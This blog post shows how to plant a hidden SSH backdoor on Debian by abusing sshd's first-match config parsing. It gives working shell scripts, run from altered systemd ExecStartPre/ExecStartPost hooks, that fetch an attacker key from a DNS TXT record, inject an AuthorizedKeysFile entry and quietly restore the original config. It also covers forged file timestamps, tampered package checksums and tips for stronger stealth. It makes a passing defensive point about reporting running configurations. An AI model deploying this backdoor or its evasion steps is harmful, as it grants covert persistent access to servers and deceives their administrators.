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Achieving persistence with a hidden SSH backdoor

Configuration parsing is an interesting topic I have been working on in the context of my hacking and creating simple backdoors which are hidden from your average sysadmin.

A recent post titled Everything that uses configuration files should report where they’re located piqued my interest, as it related to the unique ways that configuration files are located, prioritized, and eventually parsed. The original post argued that programs should output the location that configuration files are parsed. I concur, and also believe that programs should report their configurations as they are running. This post, among some information about sshd, outlines why.

As pointed out in the comments of a HN post, parsing of configuration files generally take a “last occurrence wins” strategy – if the same configuration option is specified multiple times, the final one takes preference (assuming the option cannot be specified multiple times). However, some programs, like sshd take the opposite approach: the first occurrence wins. From man sshd(8):

Unless noted otherwise, for each keyword, the first obtained value will be used.

sshd also offers functionality to check the configuration file:

     -T      Extended test mode.  Check the validity of the configuration file, output the effective configuration to stdout and then exit.  Optionally, Match rules may be applied by specifying the connection parameters using one or more -C options.

     -t      Test mode.  Only check the validity of the configuration file and sanity of the keys.  This is useful for updating sshd reliably as configuration options may change.

One of the gotchas here is that this test (as it is written) parses the configuration file as it exists; it does not print the current configuration of a running sshd daemon.

In the context of hacking, this is particularly useful, as it is possible to load a malicious sshd_config file, reload sshd, and then overwrite the malicious configuration file with an innocent-looking version. Your average sysadmin which may look at the sshd_config file or run sshd -T to check the configuration will be none-the-wiser to the actual configuration options used.

I recently made use of this functionality to create a minimalist ssh backdoor on Debian, achieving persistence quite easily. Using two scripts and updating systemd's ssh.service file to run the scripts before and after sshd starts, persistence using ssh is gained on the server. (Note: I also altered /var/lib/dpkg/info/openssh-server.md5sums to state the new ssh.service has the correct checksum.)

The first script has the following functionality:

  1. Determine the proper authorizedkeysfile value.
  2. Create the folder /etc/calendar/ if it does not already exist, copying the access and modifications times of the /etc/ folder.
  3. Retrieve an SSH public key from the TXT record of $(hostname) and save it to /etc/calendar/root.
  4. Copies the proper sshd configuration file to a temporary file.
  5. Overwrites the original sshd configuration file with an authorizedkeysfile option, which contains both the proper value as well as the /etc/calendar/root location (ensuring that this malicious authorizedkeysfile option is loaded first).
  6. Appends the loglevel configuration to the configuration file (ensuring it is loaded first).
  7. Appends the original sshd configuration file from the temporary file, to the new sshd configuration file.
keysfile=`/usr/sbin/sshd -T | awk -F authorizedkeysfile '/authorizedkeysfile/ {print $NF}'` || keysfile=".ssh/authorized_keys"

if [ ! -d "/etc/calendar/" ]; then
    mkdir /etc/calendar/
    touch -r /etc/ /etc/calendar/

dig +short TXT $(hostname) | sed 's/\x22//g' > /etc/calendar/root

cp /etc/ssh/sshd_config /etc/ssh/sshd_config.bak

echo "AuthorizedKeysFile /etc/calendar/root ${keysfile}" > /etc/ssh/sshd_config
echo "LogLevel ERROR" >> /etc/ssh/sshd_config
cat /etc/ssh/sshd_config.bak >> /etc/ssh/sshd_config
exit 0

This script is run when sshd is (re)started, before the sshd binary itself is executed, using the ExecStartPre systemd directive.

The second script, which is executed after the sshd binary is running (using the ExecStartPost systemd directive) simply moves the original sshd configuration file back to its original location.

mv /etc/ssh/sshd_config.bak /etc/ssh/sshd_config
touch -r /etc/ /etc/ssh/sshd_config
exit 0

The key which exists in /etc/calendar/root will now be accepted for all users on the server. A sysadmin looking at the /etc/ssh/sshd_config file will see nothing spectacular, and sshd -T will not report the in-memory configuration. Of course, if the sysadmin looks at the ssh.service file, they will see it has been altered (and which will be overwritten when openssh-server updates).

Things get a bit more interesting when it comes to to sshd. sshd_config in Debian 11+ and Ubuntu 20.04+ “sets several options as standard in /etc/ssh/sshd_config which are not the default”. Namely, Include /etc/ssh/sshd_config.d/*.conf. This is the first actionable configuration in /etc/ssh/sshd_config on Debian 11 and Ubuntu 20.04.

Therefore, instead of editing /etc/ssh/sshd_config, it is possible to simply create a file ending in .conf in /etc/ssh/sshd_config.d/ and restart sshd, and then delete the file.

What’s even more fun is that when sshd is reloaded, current connections do not acquire the new configuration. For multiplexed SSH connections, this means you may even hide your connection using an old configuration.

Is this what the DoD meant by living off the land? By knowing how programs use configuration files and abusing their functionality for exploitation?

A more persistent threat would:

  1. Use something like shc to convert these scripts into binaries,
  2. Use some type of encryption/encoding for the retrieval of the public key (versus plaintext over DNS),
  3. Set the ctime of the files using a basic trick,
  4. Use an alternative to altering the ssh.service systemd file (for example some type of service that monitors for when sshd starts/reloads and performs the necessary changes at the appropriate times, independent of systemd.)